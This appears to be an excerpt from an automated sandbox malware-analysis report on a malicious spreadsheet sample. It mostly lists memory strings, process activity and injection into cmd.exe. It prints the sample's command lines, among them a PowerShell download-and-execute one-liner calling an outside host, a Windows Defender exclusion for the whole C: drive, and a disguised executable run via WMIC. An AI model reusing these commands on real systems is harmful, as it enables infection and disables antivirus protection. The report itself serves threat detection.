        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: fKC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1h
        Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterTeamMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: Connect-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMNetworkAdapterExtendedAcl
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: f(Set-VMNetworkAdapterRoutingDomainMapping
        Source: WMIC.exe, 00000011.00000002.766693060.0000000000B40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: f"Remove-VMNetworkAdapterExtendedAcl
        Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterTeamMapping
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: f(Set-VmNetworkAdapterRoutingDomainMapping
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: f)Get-VMNetworkAdapterFailoverConfigurationiape+
        Source: powershell.exe, 00000003.00000003.742621081.0000000008D10000.00000004.00000001.sdmpBinary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\*
        Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterIsolation
        Source: ModuleAnalysisCache.3.drBinary or memory string: Test-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.drBinary or memory string: )Get-VMNetworkAdapterFailoverConfiguration
        Source: ModuleAnalysisCache.3.drBinary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
        Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterRdma
        Source: ModuleAnalysisCache.3.drBinary or memory string: (Set-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterAcl
        Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapterTeamMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: )Set-VMNetworkAdapterFailoverConfiguration
        Source: ModuleAnalysisCache.3.drBinary or memory string: Rename-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterVlan
        Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterIsolation
        Source: ModuleAnalysisCache.3.drBinary or memory string: (Add-VmNetworkAdapterRoutingDomainMapping
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: f(Add-VMNetworkAdapterRoutingDomainMapping
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: f)Get-VMNetworkAdapterFailoverConfiguration
        Source: ModuleAnalysisCache.3.drBinary or memory string: "Remove-VMNetworkAdapterTeamMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapterAcl
        Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMScsiController
        Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VmNetworkAdapterIsolation
        Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VmNetworkAdapterRoutingDomainMapping
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: f)Set-VMNetworkAdapterFailoverConfiguration
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: f"Remove-VMNetworkAdapterTeamMapping
        Source: WMIC.exe, 00000011.00000002.766693060.0000000000B40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMScsiController
        Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterRdma
        Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterRoutingDomainMapping
        Source: WMIC.exe, 00000011.00000002.766693060.0000000000B40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterVlan
        Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VmNetworkAdapterIsolation
        Source: ModuleAnalysisCache.3.drBinary or memory string: Disconnect-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: "Remove-VMNetworkAdapterExtendedAcl
        Source: ModuleAnalysisCache.3.drBinary or memory string: KC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
        Source: ModuleAnalysisCache.3.drBinary or memory string: +Remove-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: (Add-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: (Get-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
        Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VMNetworkAdapterAcl
        Source: ModuleAnalysisCache.3.drBinary or memory string: Set-VMNetworkAdapterFailoverConfiguration
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: f+Remove-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: Add-VmNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMScsiController
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: f(Get-VMNetworkAdapterRoutingDomainMapping
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: f+Remove-VMNetworkAdapterRoutingDomainMappingitpe+
        Source: ModuleAnalysisCache.3.drBinary or memory string: OC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
        Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterFailoverConfiguration
        Source: ModuleAnalysisCache.3.drBinary or memory string: (Set-VmNetworkAdapterRoutingDomainMapping
        Source: WMIC.exe, 00000011.00000002.766693060.0000000000B40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpBinary or memory string: f(Add-VmNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterExtendedAcl
        Source: C:\Windows\system32\drivers\tsusbhub.sysSystem information queried: ModuleInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_004252D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_00424F75 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_00424FD2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_00424FE7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 18_2_00424FFB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Adds a directory exclusion to Windows DefenderShow sources
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
        Allocates memory in foreign processesShow sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgMemory allocated: C:\Windows\SysWOW64\cmd.exe base: D80000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 11A0000 protect: page read and write
        Creates a thread in another existing process (thread injection)Show sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread created: C:\Windows\SysWOW64\cmd.exe EIP: D8010E
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\Test3.jpg protection: execute and read and write
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgMemory written: C:\Windows\SysWOW64\cmd.exe base: D80000
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgMemory written: C:\Windows\SysWOW64\cmd.exe base: 11A0000
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP'
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: Yara matchFile source: Telex06012020.xls, type: SAMPLE
        Source: Test3.jpg, 00000013.00000002.942660396.0000000000EA0000.00000002.00000001.sdmp, cmd.exe, 00000016.00000002.943718147.0000000003E40000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmpBinary or memory string: GetProgmanWindow
        Source: Test3.jpg, 00000013.00000002.942660396.0000000000EA0000.00000002.00000001.sdmp, cmd.exe, 00000016.00000002.943718147.0000000003E40000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: Test3.jpg, 00000013.00000002.942660396.0000000000EA0000.00000002.00000001.sdmp, cmd.exe, 00000016.00000002.943718147.0000000003E40000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: Test3.jpg, 00000013.00000002.942660396.0000000000EA0000.00000002.00000001.sdmp, cmd.exe, 00000016.00000002.943718147.0000000003E40000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmpBinary or memory string: SetProgmanWindow
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
